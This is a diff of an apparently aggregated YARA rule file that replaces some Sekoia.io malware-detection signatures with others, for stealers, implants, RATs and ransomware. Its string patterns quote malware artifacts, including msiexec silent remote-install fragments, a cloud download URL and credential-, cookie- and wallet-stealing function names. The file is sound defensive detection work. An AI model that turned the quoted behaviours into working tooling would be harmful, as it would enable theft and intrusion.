-		$a = {ff 15 ?? ?? ?? ?? 89 45 ?? 6a 14 68 ?? ?? ?? ?? ff 75 ?? e8 23 00 00 00 ff 75 ?? ff 75 ?? ff 75 ?? e8 5c 00 00 00}
+		$ = "/i http" wide
+		$ = ".msi /quiet" wide
+		$ = "%WINDIR%\\System32\\msiexec.exe"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $a
+		uint32be( 0 ) == 0x4c000000 and filesize < 1KB and all of them
 }
-rule SEKOIA_Luckymouse_Sysupdate_Payload : FILE
+rule SEKOIA_Tool_Masky_Strings : FILE
 {
 	meta:
-		description = "Detects decryption routine prologue of sysupdate samples"
+		description = "Detects Masky tool"
 		author = "Sekoia.io"
-		id = "97df4700-de35-49a0-869e-ed89a6d9cbdd"
-		date = "2022-08-19"
+		id = "542670ee-9f2e-4148-853d-a3f055bd584c"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/luckymouse_sysupdate_payload.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_masky_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e8501a50c65330153e613ae5bd6bbfbe4372d85175c3ed81d202ec5f177a94be"
+		logic_hash = "35dc536879d9464919028ace6b65b225455621035184d7b58468d259ccda62aa"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250574,55 +250557,57 @@ rule SEKOIA_Luckymouse_Sysupdate_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { DB ?? ?? C9 66 B9 ?? ?? E8 FF FF FF FF }
+		$s1 = "caa1aa2e-8a2a-4f98-bc51-b7cf10663fa9" ascii
+		$s2 = "Masky" ascii
+		$s3 = "\\Windows\\Temp\\" wide
+		$s4 = "Length must be non-negative" wide
+		$s5 = "CSP does not contain a private key" wide
 
 	condition:
-		filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them or $s1
 }
-
-rule SEKOIA_Loader_Win_Stealthvector : FILE
+rule SEKOIA_Apt_Unc3524_Quietexit_Strings : FILE
 {
 	meta:
-		description = "Detect the StealthVector malware, updated in July 2024"
+		description = "Detect the QUIETEXIT malware used by UNC3524"
 		author = "Sekoia.io"
-		id = "ecf6421a-f492-43c4-9ed7-eb4724d24779"
-		date = "2021-08-26"
+		id = "1bfa9baa-40a3-4ad7-83dc-f9340fbed180"
+		date = "2022-05-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_stealthvector.yar#L4-L32"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unc3524_quietexit_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "71ea017462bbb1891ef306d1e56dece5864885f5c8db5c50431ab085d37bda03"
+		logic_hash = "9f8bc7516fdefd94c6bddaf77ea3ac1ba8a3a6380530118c4b28d74b42eaae54"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2024-07-15"
 		classification = "TLP:CLEAR"
-		hash1 = "166b6dcdac31f4bf51e4b20a7c3f7d4f7017ca0c30fa123d5591e25c3fa66107"
-		hash2 = "ab56501167fe689fe55f6e6ddc3bb91952299bd5c3ef004b02bf1c3b4061c7cf"
-		hash3 = "0faddbe1713455e3fc9777ec45adf07b28e24f4c3ddca37586c2aa6b539898c0"
-		hash4 = "1c88150ec85a07c3db5f18c5eedcb0b653467b897af01d690ed996e5e07ba8e3"
-		hash5 = "ec10a9396dca694fe64366e0dab82d046cf92457f97efd50a68ceb85adef6b74"
 
 	strings:
-		$s1 = "Global\\kREwdFrOlvASgP4zWZyV89m6T2K0bIno" ascii
-		$s2 = "Global\\v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw" ascii
+		$ = "Child connection from %s:%s" ascii
+		$ = "Failed to run %s" ascii
+		$ = "add %s %s %s" ascii
+		$ = "/usr/bin/xauth -q" ascii
+		$ = "/tmp/dropbear-%" ascii
+		$ = "cron" ascii
+		$ = { DD E5 D5 97 20 53 27 BF F0 A2 BA CD 96 35 9A AD 1C 75 EB 47 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them or pe.imphash ( ) == "0cd7b92b97ccc7e255df1f46b5299986" or pe.imphash ( ) == "be777e91e3c42ac62471cfb7239be471" or hash.md5 ( pe.rich_signature.clear_data ) == "fcc67611d136cce0e785029bbb879b45"
+		uint32be( 0 ) == 0x7f454c46 and filesize > 1MB and 5 of them
 }
-rule SEKOIA_Infostealer_Win_Acrstealer_Str : FILE
+rule SEKOIA_Apt_Apt28_Wayzgoose_Exploit_String : FILE
 {
 	meta:
-		description = "Finds ACR Stealer standalone samples based on specific strings."
+		description = "Detects APT28's Wayzgoose exploit strings"
 		author = "Sekoia.io"
-		id = "63b4d6ff-0cab-44ec-9d53-bb2612371a48"
-		date = "2024-04-22"
+		id = "23d9e09e-202c-47f5-abf7-6b5085e44400"
+		date = "2024-04-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_acrstealer_str.yar#L1-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_wayzgoose_exploit_string.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "53d313857577b39b51a3e396c078d39a8b8ab803295b689357c3e8ea94cac9f7"
+		logic_hash = "804de275f7e8c43fe5690c0bd9338b134c0c47f845f1c3b3a747c3765815084c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250630,37 +250615,27 @@ rule SEKOIA_Infostealer_Win_Acrstealer_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "ref.txt" ascii
-		$str02 = "Wininet.dll" ascii
-		$str03 = "Content-Type: application/octet-stream; boundary=----" ascii
-		$str04 = "POST" ascii
-		$str05 = "os_c" ascii fullword
-		$str06 = "en_k" ascii fullword
-		$str07 = "MyApp/1.0" ascii
-		$str08 = "/Up/b" ascii
-		$str09 = "Hello, World!" ascii
-		$str10 = "/ujs/" ascii
-		$str11 = "/Up/" ascii fullword
-		$str12 = "ostr" ascii fullword
-		$str13 = "brCH" ascii fullword
-		$str14 = "brGk" ascii fullword
-		$str15 = "https://steamcommunity.com/profiles/" ascii
+		$ = "wayzgoose.dll"
+		$ = "wayzgoose_get_version"
+		$ = "NtSetInformationFile"
+		$ = "ZwDuplicateObject"
+		$ = "ZwClose"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
 }
-rule SEKOIA_Infostealer_Win_Banditstealer : FILE
+rule SEKOIA_Apt_Mustangpanda_Windows_Shellcode_Decryptionalgorithm : FILE
 {
 	meta:
-		description = "Finds BanditStealer samples based on specific strings"
+		description = "Decryption routine for Shellcode of MustangPanda"
 		author = "Sekoia.io"
-		id = "d1e45a5c-c06d-4161-8d30-fa94bcf0ea7a"
-		date = "2023-07-03"
+		id = "c9873a5f-97a6-477f-a1a0-650441c73444"
+		date = "2022-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_banditstealer.yar#L1-L35"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_windows_shellcode_decryptionalgorithm.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "64d4860dd8a783be10541dd5c939dcd2a2b08309a7cd17b9dbbda1ba8b26485d"
+		logic_hash = "a2ad3bd4dcbee3e23762b674ee8b6717e7ece712b0128145518bfa5d2e4bd66a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250668,42 +250643,35 @@ rule SEKOIA_Infostealer_Win_Banditstealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$spe01 = "Banditstealer" ascii
-		$spe02 = "BANDIT STEALER" ascii
-		$spe03 = "Location: Geolocation: " ascii
-		$spe04 = "awesomeProject2/core.GetWallets" ascii
-		$spe05 = "awesomeProject2/core.GetCreditCards" ascii
-		$spe06 = "awesomeProject2/core.GetCookies" ascii
-		$spe07 = "awesomeProject2/core.KillProcessByName" ascii
-		$spe08 = "main.sendZipToTelegram" ascii
-		$str01 = "json:\"city\"" ascii
-		$str02 = "UAC disabled" ascii
-		$str03 = "\\OpenVPN Connect\\profiles\\" ascii
-		$str04 = "\\Documents\\Monero\\wallets\\" ascii
-		$str05 = "cookies.sqlite" ascii
-		$str06 = "creditcard.txt" ascii
-		$str07 = "vmware.exe" ascii
-		$str08 = "aeachknmefphepccionboohckonoeemg" ascii
-		$str09 = "\\Documents\\NetSarang\\Xftp\\Sessions\\" ascii
-		$str10 = "\\WhatsApp\\Local Storage\\leveldb\\" ascii
-		$str11 = "Visited Time: %s" ascii
-		$str12 = "\\Google\\Chrome\\User Data\\Telegram Desktop\\tdata\\" ascii
+		$chunk_1 = {
+        7E ??
+        8B 55 ??
+        53
+        56
+        8B 75 ??
+        57
+        8B 7D ??
+        4F
+        8D A4 24 ?? ?? ?? ??
+        8A 1C 11
+        30 1C 30
+        }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of ( $spe* ) and 6 of ( $str* )
+		filesize < 8MB and all of them
 }
-rule SEKOIA_Apt_Polonium_Deepcreep_Strings : FILE
+rule SEKOIA_Implant_Mul_Alchimist : FILE
 {
 	meta:
-		description = "Tries to detect POLONIUM's DeepCreep implant"
+		description = "Detect the Alchimist implant based on strings"
 		author = "Sekoia.io"
-		id = "b04af229-2bea-4ee8-9e17-8e4befa06e3a"
-		date = "2022-10-12"
+		id = "66330cc6-a7da-4717-9977-0cede48f46f5"
+		date = "2022-10-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_polonium_deepcreep_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_mul_alchimist.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "60724d2eb964e2c3681b72bdb732ca640b603af7dc94b4eb6608c77cddb94011"
+		logic_hash = "d4a5338c502b145a1d7ad9f35779e24d66ee2d11bf760d498aab39e2c62fbeb4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250711,26 +250679,29 @@ rule SEKOIA_Apt_Polonium_Deepcreep_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ";Invoke-Expression -Command '$shortcut =" ascii wide
-		$ = "CreateShortcut($c1" ascii wide
-		$ = "svchostdp.exe" ascii wide
-		$ = "HNlIC91IA==" ascii wide
+		$str01 = "POST /users/loginpage.html HTTP/1.1" ascii
+		$str02 = "pm3/apps/Insekt/main.go" ascii
+		$str03 = "generate new insekt err" ascii
+		$str04 = "[SHELLCODE][filesize]:[scan]" ascii
+		$str05 = "\\Device\\NamedPipe\\cygwinbad" ascii
+		$str06 = "pm3/utils.GetTmpDir" ascii
+		$str07 = "os/exec.Command" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of them
+		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464C457F ) and 5 of them
 }
-rule SEKOIA_Apt_Muddywater_Powgoop_Loader : FILE
+rule SEKOIA_Rat_Win_Xeno_Rat : FILE
 {
 	meta:
-		description = "Detects the loader of PowGoop malware"
+		description = "Xeno RAT is an open-source RAT, used by Kimsuky in January 2024"
 		author = "Sekoia.io"
-		id = "716b45e1-9f17-4546-a003-a7c78340d623"
-		date = "2022-01-13"
+		id = "4be1ff07-8180-42a8-9f51-b5e17bf23442"
+		date = "2024-02-09"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_powgoop_loader.yar#L1-L19"
+		reference = "https://github.com/moom825/xeno-rat/tree/main/xeno%20rat%20client"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_xeno_rat.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "70f20928d2bbe081f0595ecdbb6dbe58a2f0807032598d88d829513e6d75287f"
+		logic_hash = "252dd8b236ce3570b6df504d307d88ee7431c0eee361813f1d4f8a66ef1db703"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250738,69 +250709,50 @@ rule SEKOIA_Apt_Muddywater_Powgoop_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "$d.Add($in[$i]);" ascii wide
-		$s2 = "[System.Text.Encoding]::UTF8.GetString($o);" ascii wide
-		$s3 = "$i+=(1+1)" ascii wide
-		$t = { 24 ?? 3d [1-15] 20 24 ?? 3b ?? ?? ?? 20 24 ?? 3b }
+		$ = "Xeno-manager" wide
+		$ = "moom825"
 
 	condition:
-		filesize < 50KB and ( 3 of ( $s* ) or $t in ( filesize -50 .. filesize ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SEKOIA_Infostealer_Win_Mars_Stealer : FILE
+rule SEKOIA_Apt_Toddycat_Waexp_Strings : FILE
 {
 	meta:
-		description = "Detect Mars Stealer based on specific strings"
+		description = "Detects WAExp based on strings"
 		author = "Sekoia.io"
-		id = "3e2c7440b2fc9e4b039e6fa8152ac8fd"
-		date = "2022-02-03"
+		id = "1bbb3e81-14a9-4bda-b647-b6f5255e9a16"
+		date = "2024-04-23"
 		modified = "2024-12-19"
-		reference = "https://3xp0rt.com/posts/mars-stealer"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_mars_stealer.yar#L3-L44"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toddycat_waexp_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b2b36a280c3c6cbbb8cbb9f1dd3eb48a4943ebbddb48eba2ac3d0db03924cafd"
+		logic_hash = "4377183b326329fb14ae3911fbb1e29cde220d7b247d048fba4bbbda9de8938d"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2022-02-14"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dec = {a3 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? 00 00 83 c4 ??}
-		$api00 = "LoadLibrary" ascii
-		$api01 = "GetProcAddress" ascii
-		$api02 = "ExitProcess" ascii
-		$api03 = "advapi32.dll" ascii
-		$api04 = "crypt32.dll" ascii
-		$api05 = "GetTickCount" ascii
-		$api06 = "Sleep" ascii
-		$api07 = "GetUserDefaultLangID" ascii
-		$api08 = "CreateMutex" ascii
-		$api09 = "GetLastError" ascii
-		$api10 = "HeapAlloc" ascii
-		$api11 = "GetProcessHeap" ascii
-		$api12 = "GetComputerName" ascii
-		$api13 = "VirtualProtect" ascii
-		$api14 = "GetUserName" ascii
-		$api15 = "CryptStringToBinary" ascii
-		$str0 = "JohnDoe" ascii
+		$ = "[>] Profile:" wide ascii
+		$ = "[+] All Done" wide ascii
+		$ = "[+] Files:" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( #dec > 400 and 12 of ( $api* ) and $str0 ) or for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == "LLCPPC" and pe.sections [ i ] . raw_data_size < 5000 )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them and filesize < 1MB
 }
-rule SEKOIA_Implant_Macos_Geacon : FILE
+rule SEKOIA_Tool_Win_Sharpshares : FILE
 {
 	meta:
-		description = "Finds Geacon samples based on specific strings"
+		description = "Finds sharpshares EXE based on strings"
 		author = "Sekoia.io"
-		id = "a7784bfa-66a7-47df-b88b-d98217d8cca5"
-		date = "2024-01-11"
+		id = "ef90d573-12f8-4216-9a9e-96e7d1e841d0"
+		date = "2024-06-10"
 		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_macos_geacon.yar#L1-L35"
+		reference = "https://github.com/mitchmoser/SharpShares/releases"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_sharpshares.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "284574d185d3777a373f4a19e0870eec5245fb8ea5ebd6124bc281f8c74e0998"
+		logic_hash = "6aa96d7c24638451bde98497cc7c844c87612d81cc7826113729c80bd5180442"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250808,40 +250760,33 @@ rule SEKOIA_Implant_Macos_Geacon : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$gea01 = "geacon/config.init" ascii
-		$gea02 = "geacon_pro-master/config/config.go" ascii
-		$gea03 = "geacon_plus-main/config/config.go" ascii
-		$gea04 = "command type %d is not support by geacon now" ascii
-		$gea05 = "main/sysinfo.GeaconID" ascii
-		$str01 = "command.StealToken" ascii
-		$str02 = "command.MakeToken" ascii
-		$str03 = "command/misc.go" ascii
-		$str04 = "config/c2profile.go" ascii
-		$str05 = "crypt.AesCBCDecrypt" ascii
-		$str06 = "packet.File_Browse" ascii
-		$str07 = "packet.FirstBlood" ascii
-		$str08 = "packet.ParseCommandShell" ascii
-		$str09 = "packet.ParseCommandUpload" ascii
-		$str10 = "packet.PushResult" ascii
-		$str11 = "sysinfo.GetComputerName" ascii
-		$str12 = "sysinfo.IsOSX64" ascii
-		$str13 = "util..inittask" ascii
+		$str01 = "<GetAllShares>b__0" ascii
+		$str02 = "<SearchLDAP>b__0_0" ascii
+		$str03 = "get_AccessControlType" ascii
+		$str04 = "get_IdentityReference" ascii
+		$str05 = "get_PropertiesToLoad" ascii
+		$str06 = "SharpShares\\obj\\Release\\SharpShares.pdb" ascii
+		$str07 = "/filter:SYSVOL,NETLOGON,IPC$,PRINT$" wide
+		$str08 = "/threads:50 /ldap:servers" wide
+		$str09 = "SharpShares.exe" ascii wide
+		$str10 = "[+] LDAP Search Results:" wide
+		$str11 = "[+] Finished Enumerating Shares" wide
 
 	condition:
-		uint32( 0 ) == 0xFEEDFACF and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SEKOIA_Implant_Mul_Alchimist : FILE
+rule SEKOIA_Apt_Cloudmensis_Downloader_Strings : FILE
 {
 	meta:
-		description = "Detect the Alchimist implant based on strings"
+		description = "Detects CloudMensis downloader"
 		author = "Sekoia.io"
-		id = "66330cc6-a7da-4717-9977-0cede48f46f5"
-		date = "2022-10-18"
+		id = "450cfa42-7b56-4d93-afe2-9cf5c1049217"
+		date = "2022-07-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_mul_alchimist.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudmensis_downloader_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d4a5338c502b145a1d7ad9f35779e24d66ee2d11bf760d498aab39e2c62fbeb4"
+		logic_hash = "9532530f9b6c39d64611354f5d3c95e7c8b9ebf917ab797c162c3b51945db1fc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250849,29 +250794,26 @@ rule SEKOIA_Implant_Mul_Alchimist : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "POST /users/loginpage.html HTTP/1.1" ascii
-		$str02 = "pm3/apps/Insekt/main.go" ascii
-		$str03 = "generate new insekt err" ascii
-		$str04 = "[SHELLCODE][filesize]:[scan]" ascii
-		$str05 = "\\Device\\NamedPipe\\cygwinbad" ascii
-		$str06 = "pm3/utils.GetTmpDir" ascii
-		$str07 = "os/exec.Command" ascii
+		$ = "https://api.pcloud.com/getfilelink?path=%@&forcedownload=1"
+		$ = "python -c 'import os; print(os.confstr(65538))'"
+		$ = "getCmdResult:"
+		$ = "[pCloud DownloadFile:]"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464C457F ) and 5 of them
+		uint32be( 0 ) == 0xcafebabe and filesize < 1MB and all of them
 }
-rule SEKOIA_Hacktool_Ipmipwner_Strings : FILE
+rule SEKOIA_Loader_Win_Fudloader : FILE
 {
 	meta:
-		description = "Detects ipmiPwner script"
+		description = "Finds FUD-Loader samples based on specific strings"
 		author = "Sekoia.io"
-		id = "2ac736b5-33bb-477f-a98c-57cc2744d251"
-		date = "2023-12-08"
+		id = "4c2ac614-89af-4449-9fd2-9f935e4c27b8"
+		date = "2023-09-25"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ipmipwner_strings.yar#L1-L16"
+		reference = "https://github.com/0day2/FUD-Loader/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_fudloader.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "122311e1791d018f08f3d5ecdf2e0efe3aa5bb913b2c1ce6a3797e8ceb2676eb"
+		logic_hash = "bf19169963cfcbcf41a2dc5f9447738e957878972590b2a8d310eed1c54f3676"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250879,129 +250821,110 @@ rule SEKOIA_Hacktool_Ipmipwner_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "{status} Using the list of users that the {lgcyan}script"
-		$ = "--host 192.168.1.12 -p 624 -uW /opt/SecLists/Usernames/"
+		$str01 = "set_WindowStyle" ascii
+		$str02 = "set_FileName" ascii
+		$str03 = "get_StartInfo" ascii
+		$str04 = "GetRandomFileName" ascii
+		$str05 = "DownloadFile" ascii
+		$str06 = "GetTempPath" ascii
+		$str07 = "ProcessStartInfo" ascii
+		$str08 = "System.Diagnostics" ascii
 
 	condition:
-		all of them and filesize < 10KB
+		uint16( 0 ) == 0x5a4d and all of them and filesize < 10KB
 }
-rule SEKOIA_Backdoor_Win_Feedload : FILE
+
+rule SEKOIA_Ransomware_Lin_Avoslocker_Sections : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detect AvosLocker ransomware for Linux by using its section hashes"
 		author = "Sekoia.io"
-		id = "29cc46c4-7ed7-4a34-9749-a8ba8d37eb4c"
-		date = "2023-10-24"
+		id = "3a7bf14d-24fb-47c9-b073-dd734f808983"
+		date = "2022-02-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_feedload.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_lin_avoslocker_sections.yar#L4-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "f251144f7ad0be0045034a1fc33fb896e8c32874e0b05869ff5783e14c062486"
-		logic_hash = "18eb3fc9b11ed21a76a2921c3d9681b09cf2f306263c2ece76c1bf4a65467777"
-		score = 75
+		logic_hash = "67becae97ccfaf2e62c0329e23a91b1134c265bc83b1fc9091b170a1e04f34d4"
+		score = 40
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$s1 = "                                        C:\\LibreSS5\\crypto\\"
+		hash1 = "0cd7b6ea8857ce827180342a1c955e79c3336a6cf2000244e5cfd4279c5fc1b6"
+		hash2 = "7c935dcd672c4854495f41008120288e8e1c144089f1f06a23bd0a0f52a544b1"
+		hash3 = "10ab76cd6d6b50d26fde5fe54e8d80fceeb744de8dbafddff470939fac6a98c4"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and #s1 > 200
+		uint32( 0 ) == 0x464c457f and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "91476dafa5ef669483350538fa6ec4cb" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "c2b21b2556c9d751e203965c825f8a81" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "f858d36231ba743ad8c898d86a67a864" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "489c87d7b1a694980587dfb413fb2afc" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "972e27e9f115278244f5e4ae89dd412a" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "d1f5b688a92b611e1363945fa552a9d7" )
 }
-rule SEKOIA_Apt_Lazarus_Dll_C2_Comms : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_8 : FILE
 {
 	meta:
-		description = "Detects DLL communicating with the C2"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "9b379aa8-77ce-4c76-ab13-05e35ebfbdfe"
-		date = "2023-04-04"
+		id = "e28a1cd3-f7b6-4a55-8229-484e0bbeb7cb"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_dll_c2_comms.yar#L1-L33"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_8.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b5ba5ae25822cf54d530d1a18c8196194d44e4fd76be1a0bf98c193772286282"
+		logic_hash = "71e4eb41968818e1dd484a259af9eec30a517423b00da75ce21773bf695cbc7d"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e"
-		hash2 = "bb1066c1ca53139dc5a2c1743339f4e6360d6fe4f2f3261d24fc28a12f3e2ab9"
-		hash3 = "dca33d6dacac0859ec2f3104485720fe2451e21eb06e676f4860ecc73a41e6f9"
-		hash4 = "69dd140f45c3fa3aaa64c69f860cd3c74379dec37c46319d7805a29b637d4dbf"
 
 	strings:
-		$x1 = "vG2eZ1KOeGd2n5fr" ascii fullword
-		$s1 = "Windows %d(%d)-%s" ascii fullword
-		$s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" wide fullword
